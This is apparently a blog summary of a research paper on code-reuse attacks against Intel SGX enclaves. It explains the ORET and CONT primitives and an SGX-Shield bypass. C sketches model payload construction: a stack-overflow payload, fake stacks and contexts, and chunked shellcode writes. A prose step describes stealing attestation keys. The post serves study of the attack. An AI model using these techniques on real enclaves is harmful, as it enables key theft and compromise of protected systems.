The Guard's Dilemma

Posted on 2019-02-25 Edited on 2021-05-22 In paper

Introduction

SGX isolates sensitive code and data from the OS, hypervisor, BIOS and other applications. Moreover, enclave code and data are always encrypted whenever they leave the CPU. Sensitive application data, e.g. cryptographic keys, is protected inside SGX containers called enclaves, which can be created dynamically while the application, known as the host, is running. Enclaves expose predefined entry points through which the host invokes the sensitive computation.

Ideally, an enclave contains only minimal, carefully inspected code that could be formally proven free of vulnerabilities. However, legacy applications can also be adapted to run inside SGX enclaves with the necessary modifications. Formally proving or manually inspecting such legacy code is not feasible, so memory-corruption vulnerabilities are likely to exist in enclaves.

Recently, Dark-ROP [1] was proposed to exploit memory-corruption vulnerabilities against SGX. Dark-ROP combines return-oriented programming with several oracles that inform the attacker about the internal state of the enclave. However, Dark-ROP requires a non-randomized memory layout to locate secret code and data after crashing the enclave. Consequently, SGX-Shield [2], which randomizes the enclave's memory layout, mitigates the Dark-ROP attack.

However, SGX-Shield does not randomize the part of the SGX SDK that handles transitions between host code and enclave code, and this code contains a number of gadgets usable in a ROP attack. This paper demonstrates that this interface code alone is enough to mount powerful run-time attacks and bypass SGX-Shield without requiring kernel privileges.

The Guard’s Dilemma

Controlling registers is essential in any code-reuse attack: registers hold data for subsequent gadgets and arguments for function calls. Attackers therefore typically rely on register-setting gadgets, e.g. pop gadgets. This paper instead lets the attacker use whole functions of the trusted runtime system (tRTS) as building blocks instead of small gadgets. Here lies the dilemma: the SDK is essential for creating enclaves, yet in this case it is exactly what exposes them to attacks.

The paper introduces two new exploitation primitives:

The ORET primitive gives the attacker control of a critical set of CPU registers by exploiting a stack overflow vulnerability.
The CONT primitive gives the attacker control of all general-purpose registers, given control of a single register (rdi on x86_64).

Overview and Attack Workflow

Primitives

ORET primitive. The asm_oret function restores the CPU context after an OCALL. Once the attacker controls the instruction pointer (i.e., has hijacked control flow) and the stack contents, e.g. through a stack overflow or a format-string bug, she can set a subset of the CPU registers, e.g. rdi and rip.
CONT primitive. The continue_execution function is meant to restore the CPU context after an exception. The prerequisite is calling this function with a controlled rdi register, e.g. by exploiting a memory corruption that affects a function pointer. The attacker then gains control over all general-purpose CPU registers.
ORET+CONT loop. The basic idea behind the attack is to use the CONT primitive repeatedly to invoke the various gadgets with the correct register values.

Each iteration of this loop executes one gadget and is structured as follows:

A CONT primitive points the stack pointer into attacker-controlled memory and executes a gadget.
Once the gadget completes, the earlier stack manipulation causes the execution of an ORET primitive.
The ORET primitive triggers the CONT primitive for the next gadget, continuing the cycle from the first step.
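The loop can be illustrated with a toy model in C. This is a minimal sketch under simplifying assumptions, not SGX code: gadgets are ordinary C functions selected by an index stored in rip, registers live in a small hypothetical regs_t, and "returning into ORET" is modelled by reading the next fake OCALL frame, whose saved rdi selects the next fake exception structure handed to CONT.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Tiny register file; rip holds a gadget index instead of an address. */
typedef struct { uint64_t rax, rcx, rdi; size_t rip; } regs_t;
typedef void (*gadget_fn)(regs_t *r, uint64_t *mem);

/* Two illustrative gadgets operating on a word array. */
static void g_store(regs_t *r, uint64_t *mem) { mem[r->rcx] = r->rax; }   /* *rcx = rax  */
static void g_add(regs_t *r, uint64_t *mem)   { mem[r->rcx] += r->rax; }  /* *rcx += rax */
static gadget_fn const gadgets[] = { g_store, g_add };

/* Fake exception information: the full context CONT restores. */
typedef struct { regs_t ctx; } fake_exc_t;

/* Fake OCALL frame on the fake stack: ORET loads rdi from it and its saved
 * rip is always continue_execution, so only the next structure's index is kept. */
typedef struct { size_t xdi; } fake_ocall_frame_t;

/* Runs n_exc iterations (n_exc >= 1); returns the number of gadgets executed. */
static size_t run_loop(const fake_exc_t *exc, size_t n_exc,
                       const fake_ocall_frame_t *fake_stack, uint64_t *mem) {
    size_t executed = 0;
    size_t arg = 0;                               /* continue_execution's rdi */
    for (;;) {
        regs_t r = exc[arg].ctx;                  /* CONT: restore every register */
        assert(r.rip < sizeof gadgets / sizeof gadgets[0]);
        gadgets[r.rip](&r, mem);                  /* run the gadget */
        if (++executed == n_exc) break;
        arg = fake_stack[executed - 1].xdi;       /* gadget ret -> ORET -> next CONT */
    }
    return executed;
}
```

Each fake OCALL frame only has to carry a pointer (here an index) to the next fake exception structure, which is why the attacker prepares one frame per transition between gadgets.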

Workflow

Payload preparation
The attacker performs static analysis on the enclave binary to find gadgets in its non-randomized part, e.g. tRTS. Next, she constructs a gadget chain and defines the register state that must be set before each gadget executes, e.g. the function argument registers. Under the threat model, the attacker knows the memory layout, including the location of the enclave binary. She also has to determine the offsets of asm_oret and continue_execution (both in tRTS).
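The result of this preparation step can be recorded in a few plain structures. The sketch below is hypothetical: the type names, the chosen registers and the example offsets are illustrative only, and addresses are resolved by adding offsets to the enclave base, which the threat model assumes is known.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* tRTS offsets found by static analysis (hypothetical representation). */
typedef struct {
    uint64_t asm_oret;            /* offset of asm_oret */
    uint64_t continue_execution;  /* offset of continue_execution */
} trts_offsets_t;

/* One link of the gadget chain: where the gadget is, and the register
 * state it expects (e.g. argument registers for a function call). */
typedef struct {
    uint64_t gadget;              /* offset on input, absolute address after resolve */
    uint64_t rdi, rsi, rdx, rax, rcx;
} chain_entry_t;

/* Rebase every offset on the enclave load address. */
static void resolve(uint64_t enclave_base, trts_offsets_t *t,
                    chain_entry_t *chain, size_t n) {
    t->asm_oret += enclave_base;
    t->continue_execution += enclave_base;
    for (size_t i = 0; i < n; i++)
        chain[i].gadget += enclave_base;
}
```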
Fake structures preparation
The primitives work by abusing functions intended to restore CPU contexts, tricking them into restoring fake contexts. In contrast to a standard ROP exploit, the attacker needs a number of memory structures to hold the fake contexts and drive the execution primitives.

Two kinds of structures are needed: multiple fake exception information structures, one per gadget, and a fake stack.
The fake stack is a supporting structure for the ORET+CONT loop and serves two purposes. On the one hand, it brings control back to an ORET primitive after a gadget executes. On the other hand, it contains the fake context for the transition from the ORET primitive to the CONT primitive that continues the loop.

Attack execution
When the vulnerability satisfies the CONT preconditions (e.g., exploitation of an indirect function call), the attacker can execute the first CONT directly. When it satisfies the ORET preconditions (e.g., a stack overflow), the attacker uses ORET to set the first function argument register (rdi) and the instruction pointer, i.e., to call continue_execution on the first fake exception structure.

Details

ORET Primitive

The ORET primitive abuses the asm_oret function, which restores the CPU context from the OCALL frame saved on the stack. Its prototype is:

sgx_status_t asm_oret(uintptr_t sp, void *ms);

The first argument (sp) points to the OCALL frame, which contains the partial CPU context to be restored, including saved values for rbp, rdi, rsi, rbx, and r12 to r15.

typedef struct _ocall_context_t {
  uintptr_t r15;
  uintptr_t r14;
  uintptr_t r13;
  uintptr_t r12;
  uintptr_t xbp;  //rbp
  uintptr_t xdi;  //rdi
  uintptr_t xsi;  //rsi
  uintptr_t xbx;  //rbx

  uintptr_t ocall_ret;  // new rip for SDK versions before 2.0
} ocall_context_t;
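Because asm_oret reads the OCALL frame as an array of machine words, what matters to an attacker is the position of each field. The sketch below computes those positions for the struct exactly as excerpted above; this is an assumption for illustration, since the SDK's real definition may contain further fields and therefore different offsets. It uses C11 `_Static_assert` to check the layout at compile time.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* The OCALL frame as excerpted in this post (illustrative layout only). */
typedef struct {
    uintptr_t r15;
    uintptr_t r14;
    uintptr_t r13;
    uintptr_t r12;
    uintptr_t xbp;        /* rbp */
    uintptr_t xdi;        /* rdi */
    uintptr_t xsi;        /* rsi */
    uintptr_t xbx;        /* rbx */
    uintptr_t ocall_ret;  /* new rip for SDK versions before 2.0 */
} ocall_context_t;

/* All fields are word-sized, so field k sits at word k. */
_Static_assert(offsetof(ocall_context_t, xdi) == 5 * sizeof(uintptr_t), "xdi is word 5");
_Static_assert(offsetof(ocall_context_t, ocall_ret) == 8 * sizeof(uintptr_t), "ocall_ret is word 8");

/* Word index of a field, i.e. where a fake frame must hold that value. */
static size_t frame_word(size_t byte_offset) {
    return byte_offset / sizeof(uintptr_t);
}

/* Size of the whole frame in words. */
static size_t ocall_frame_words(void) {
    return sizeof(ocall_context_t) / sizeof(uintptr_t);
}
```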

An attacker who controls the OCALL frame can set all of these registers; moreover, she can also set the new instruction pointer (rip).

The values of rsp and rip after asm_oret depend on the SGX SDK version. In versions earlier than 2.0, the stack pointer is set to point to the ocall_ret field before a ret instruction is issued. Hence, the new instruction pointer is the value of ocall_ret, and the new stack pointer points to the memory location immediately following the OCALL frame.

Starting with version 2.0, a more traditional epilogue is used: the base pointer (rbp) is moved into rsp, rbp is popped from the stack, and finally a ret is issued. Therefore, the saved rbp value (xbp) in the OCALL frame must point to a memory area containing two 64-bit words: the new value for rbp and the return address (the new instruction pointer).
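The difference between the two epilogues can be sketched with a toy word-addressed stack. This is an illustrative model, not the SDK's assembly: memory is an array of 64-bit words, rsp and rbp are word indices, the frame order follows the excerpted ocall_context_t, and the F_* constants and the cpu_t type are hypothetical names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Word positions inside the excerpted ocall_context_t. */
enum { F_R15, F_R14, F_R13, F_R12, F_XBP, F_XDI, F_XSI, F_XBX, F_OCALL_RET, F_WORDS };

typedef struct { uint64_t rbp, rdi, rsi, rbx, r12, r13, r14, r15, rip, rsp; } cpu_t;

/* Register restore shared by both versions. */
static void restore_common(cpu_t *c, const uint64_t *mem, uint64_t sp) {
    c->r15 = mem[sp + F_R15]; c->r14 = mem[sp + F_R14];
    c->r13 = mem[sp + F_R13]; c->r12 = mem[sp + F_R12];
    c->rbp = mem[sp + F_XBP]; c->rdi = mem[sp + F_XDI];
    c->rsi = mem[sp + F_XSI]; c->rbx = mem[sp + F_XBX];
}

/* SDK < 2.0: rsp is moved to ocall_ret, then `ret` pops it. */
static void oret_pre_2_0(cpu_t *c, const uint64_t *mem, uint64_t sp) {
    restore_common(c, mem, sp);
    c->rsp = sp + F_OCALL_RET;
    c->rip = mem[c->rsp++];          /* ret */
}

/* SDK >= 2.0: mov %rbp, %rsp; pop %rbp; ret. */
static void oret_2_0(cpu_t *c, const uint64_t *mem, uint64_t sp) {
    restore_common(c, mem, sp);
    c->rsp = c->rbp;                 /* rsp = restored xbp */
    c->rbp = mem[c->rsp++];          /* pop %rbp */
    c->rip = mem[c->rsp++];          /* ret */
}
```

In both versions the attacker chooses rip; only the place it is read from changes (ocall_ret before 2.0, the second word at xbp from 2.0 on).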

The first operation performed by asm_oret is moving rsp to the sp argument, i.e., the top of the OCALL frame. An attacker can instead jump to the code right after this step, so that asm_oret treats the top of the current stack as the OCALL frame. Hence it is always possible to abuse asm_oret to restore a fake OCALL frame placed at the top of the stack, without controlling the first argument, by jumping to an appropriate instruction inside asm_oret.

An attacker who controls the stack contents can therefore reuse asm_oret to set registers. Suppose the enclave is vulnerable to a stack buffer overflow. The attacker exploits it to overwrite a return address with the address of asm_oret, adjusted to skip the instructions mentioned above, and places a fake ocall_context_t immediately after the return address. When the vulnerable function returns, control is transferred to asm_oret with the fake OCALL frame at the top of the stack.
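The overflow described above can be pictured as a sequence of 64-bit words. The sketch below is hypothetical: it assumes the buffer is immediately followed by the saved return address (real frames may hold a saved rbp, padding or other data in between), uses the excerpted ocall_context_t order, and takes placeholder values for the adjusted asm_oret entry point and for the new rdi and rip.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Word positions inside the excerpted ocall_context_t. */
enum { F_R15, F_R14, F_R13, F_R12, F_XBP, F_XDI, F_XSI, F_XBX, F_OCALL_RET, F_WORDS };

/* Builds the words written from the start of the vulnerable buffer:
 * filler, the overwritten return address, then the fake OCALL frame.
 * Returns the payload length in words, or 0 if out[] is too small. */
static size_t build_oret_payload(uint64_t *out, size_t out_words, size_t buf_words,
                                 uint64_t asm_oret_skip,  /* adjusted entry point */
                                 uint64_t new_rdi, uint64_t new_rip) {
    size_t total = buf_words + 1 + F_WORDS;
    if (out_words < total) return 0;
    memset(out, 0x41, buf_words * sizeof *out);  /* filler up to the return slot */
    out[buf_words] = asm_oret_skip;              /* replaces the return address */
    uint64_t *frame = out + buf_words + 1;       /* top of stack after the ret */
    memset(frame, 0, F_WORDS * sizeof *frame);
    frame[F_XDI] = new_rdi;                      /* loaded into rdi by asm_oret */
    frame[F_OCALL_RET] = new_rip;                /* new rip (SDK < 2.0 layout) */
    return total;
}
```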

CONT Primitive

The CONT primitive is based on the exception-handling function continue_execution, which is used to restore the CPU context from an exception information structure:

void continue_execution(sgx_exception_info_t *info);

typedef struct _sgx_exception_info_t {
  sgx_cpu_context_t       cpu_context;
  sgx_exception_vector_t  exception_vector;
  sgx_exception_type_t    exception_type;
} sgx_exception_info_t;

typedef struct _cpu_context_t {
  uint64_t  rax;
  uint64_t  rcx;
  uint64_t  rdx;
  uint64_t  rbx;
  uint64_t  rsp;
  uint64_t  rbp;
  uint64_t  rsi;
  uint64_t  rdi;
  uint64_t  r8;
  //...
  uint64_t  r15;
  uint64_t  rflags;
  uint64_t  rip;
} sgx_cpu_context_t;

Note that the stack pointer (rsp) and the instruction pointer (rip) are part of this context, so the attacker can point the stack pointer into attacker-controlled memory (a fake stack) and hijack execution. This technique is known as stack pivoting.

For example, continue_execution can be reused by corrupting a function pointer so that it points to continue_execution; in addition, the attacker needs to control rdi or the memory pointed to by rdi.
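Stack pivoting through continue_execution can be modelled in a few lines. This is a toy sketch, not the SDK's implementation (which is written in assembly): the context struct spells out every x86-64 general-purpose register, memory is an array of 64-bit words, and rsp is an index into it. The point is that once rsp comes from the fake context, the gadget's final ret pops its next rip from attacker-chosen memory.

```c
#include <assert.h>
#include <stdint.h>

/* Toy copy of the context layout, with r9..r14 written out. */
typedef struct {
    uint64_t rax, rcx, rdx, rbx, rsp, rbp, rsi, rdi;
    uint64_t r8, r9, r10, r11, r12, r13, r14, r15;
    uint64_t rflags, rip;
} sgx_cpu_context_t;

/* Toy CPU: rsp is an index into a word array instead of an address. */
typedef struct {
    sgx_cpu_context_t regs;
    const uint64_t *mem;
} toy_cpu_t;

/* Stand-in for continue_execution: every register, rsp and rip included,
 * is loaded from the (possibly fake) context. Loading rsp is the pivot. */
static void toy_continue_execution(toy_cpu_t *cpu, const sgx_cpu_context_t *ctx) {
    cpu->regs = *ctx;
}

/* The `ret` at the end of a gadget: pop the next rip from the current stack. */
static void toy_ret(toy_cpu_t *cpu) {
    cpu->regs.rip = cpu->mem[cpu->regs.rsp];
    cpu->regs.rsp += 1;
}
```

In the ORET+CONT loop, the word popped by that ret would be the adjusted asm_oret address at the top of the fake stack.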

Fake stack

The fake stack chains CONT to ORET. It is composed of a sequence of frames, each consisting of the address of asm_oret (properly adjusted) followed by an ocall_context_t structure. The CONT in the loop invokes a gadget with the stack pointer set to the top of the fake stack, so the address of asm_oret is at the top of the stack when the gadget returns. The gadget therefore returns into asm_oret, launching an ORET primitive that restores the fake context from the frame. This fake context sets rdi to point to a fake exception structure and the instruction pointer to continue_execution.
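A fake stack with this layout could be generated as below. The sketch assumes the pre-2.0 frame handling (rip taken from ocall_ret) and the excerpted field order; the addresses are hypothetical placeholders, and next_exc[i] stands for the fake exception structure that the i-th ORET passes to continue_execution in rdi.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Word positions inside the excerpted ocall_context_t. */
enum { F_R15, F_R14, F_R13, F_R12, F_XBP, F_XDI, F_XSI, F_XBX, F_OCALL_RET, F_WORDS };
/* One fake-stack frame: adjusted asm_oret address + fake OCALL frame. */
enum { FRAME_WORDS = 1 + F_WORDS };

/* Writes n frames into out[]; returns the number of words written, or 0 if
 * out[] is too small. */
static size_t build_fake_stack(uint64_t *out, size_t out_words,
                               const uint64_t *next_exc, size_t n,
                               uint64_t asm_oret_skip, uint64_t continue_execution) {
    if (n > out_words / FRAME_WORDS) return 0;
    for (size_t i = 0; i < n; i++) {
        uint64_t *f = out + i * FRAME_WORDS;
        for (size_t w = 0; w < FRAME_WORDS; w++)
            f[w] = 0;                               /* unused registers */
        f[0] = asm_oret_skip;                       /* popped by the gadget's ret */
        f[1 + F_XDI] = next_exc[i];                 /* rdi for the next CONT */
        f[1 + F_OCALL_RET] = continue_execution;    /* rip after ORET (pre-2.0) */
    }
    return n * FRAME_WORDS;
}
```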

Fake exception information

For each gadget, the attacker sets up a fake sgx_exception_info_t structure with the desired register values and with the instruction pointer set to the gadget's address. The stack pointer is set to the top of the fake stack.
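Filling in the fake exception structures is mechanical once the chain is known. In the sketch below, gadget_step_t and FRAME_BYTES are hypothetical: each step records the gadget address and the registers it needs, and each fake-stack frame is assumed to occupy 10 words (the adjusted asm_oret address plus the nine-word excerpted OCALL frame), so structure i pivots rsp onto frame i.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef struct {
    uint64_t rax, rcx, rdx, rbx, rsp, rbp, rsi, rdi;
    uint64_t r8, r9, r10, r11, r12, r13, r14, r15;
    uint64_t rflags, rip;
} sgx_cpu_context_t;

/* Hypothetical description of one gadget invocation. */
typedef struct {
    uint64_t gadget;          /* absolute gadget address */
    uint64_t rax, rcx, rdi;   /* registers the gadget needs */
} gadget_step_t;

/* Assumed size of one fake-stack frame: 1 + 9 words of 8 bytes. */
enum { FRAME_BYTES = 10 * 8 };

/* Fills one fake context per gadget; unspecified registers are zero. */
static void build_fake_contexts(sgx_cpu_context_t *out, const gadget_step_t *steps,
                                size_t n, uint64_t fake_stack_base) {
    for (size_t i = 0; i < n; i++) {
        sgx_cpu_context_t c = {0};
        c.rax = steps[i].rax;
        c.rcx = steps[i].rcx;
        c.rdi = steps[i].rdi;
        c.rip = steps[i].gadget;                              /* CONT jumps here */
        c.rsp = fake_stack_base + (uint64_t)i * FRAME_BYTES;  /* pivot onto frame i */
        out[i] = c;
    }
}
```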

Attacking SGX-Shield

Overview of SGX-Shield

Fine-grained randomization
Software DEP
Software Fault Isolation
Coarse-grained Control Flow Integrity

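Because SGX-Shield needs writable code pages while loading the enclave, and SGX (version 1) does not allow enclave page permissions to be changed after initialization, the enclave code stays writable for the enclave's whole lifecycle.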

Exploit

Assumption: a stack overflow vulnerability in the enclave.
Observation: SGX-Shield enclaves feature writable code pages.
Idea: a first stage based on code reuse injects a second stage, i.e., shellcode.

First stage

Payload preparation. The attacker starts by determining the offsets of asm_oret and continue_execution. Next, for the code-injection attack, the attacker needs a gadget that writes to memory; one is found in the do_rdrand function in tRTS:
mov %eax, (%rcx)
mov $1, %eax
ret
The chain repeatedly invokes this gadget to write the shellcode 4 bytes at a time, with rax holding each 4-byte chunk and rcx its destination. The destination address for the shellcode is taken from the writable SGX-Shield code pages.
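The write chain amounts to slicing the shellcode into 32-bit values for eax and matching destinations for rcx. The sketch below assumes little-endian x86 stores, zero-pads the last chunk, and replays the gadget's mov %eax, (%rcx) against a byte array that stands in for the writable code pages (rcx is an offset into that array here, not a real address); write_step_t, plan_writes and replay are hypothetical names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* One invocation of the write gadget: eax is stored at the address in rcx. */
typedef struct { uint32_t eax; uint64_t rcx; } write_step_t;

/* Splits len bytes into 4-byte little-endian chunks with their destinations;
 * the tail is zero-padded. Returns the number of gadget invocations,
 * i.e. ceil(len / 4). out[] must hold that many entries. */
static size_t plan_writes(write_step_t *out, const uint8_t *code, size_t len,
                          uint64_t dest) {
    size_t n = (len + 3) / 4;
    for (size_t i = 0; i < n; i++) {
        uint8_t chunk[4] = {0};
        size_t left = len - 4 * i;               /* > 0 because i < n */
        memcpy(chunk, code + 4 * i, left < 4 ? left : 4);
        out[i].eax = (uint32_t)chunk[0] | (uint32_t)chunk[1] << 8 |
                     (uint32_t)chunk[2] << 16 | (uint32_t)chunk[3] << 24;
        out[i].rcx = dest + 4 * i;
    }
    return n;
}

/* Toy replay of `mov %eax, (%rcx)` for every planned step. */
static void replay(uint8_t *page, const write_step_t *steps, size_t n) {
    for (size_t i = 0; i < n; i++)
        for (int b = 0; b < 4; b++)
            page[steps[i].rcx + b] = (uint8_t)(steps[i].eax >> (8 * b));
}
```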
Fake structures preparation. The attacker creates a fake stack that contains the address of continue_execution repeated n-1 times, where n is the number of gadgets in the chain. She also sets up an sgx_exception_info_t structure specifying all registers, with rip set to the shellcode's address and the other registers at her discretion.
Attack execution. The attacker triggers the stack overflow in the enclave. She overwrites a return address with the (adjusted) address of asm_oret and places a fake ocall_context_t after it, with ocall_ret set to the address of continue_execution and rdi set to the address of the first fake sgx_exception_info_t. As a result, continue_execution is called on the fake exception structure, which starts the chain. The fake exception structure sets rip to the gadget's address, and rax and rcx to the values that place the attacker's code in the SGX-Shield code pages. rsp points to the fake stack, whose entries are all the address of continue_execution, so the gadget's ret leads into the next CONT.

Second stage

The shellcode has full control over the enclave. In this case, the attacker uses the shellcode to extract the cryptographic keys used during the remote attestation process, and can then send these keys to a remote server.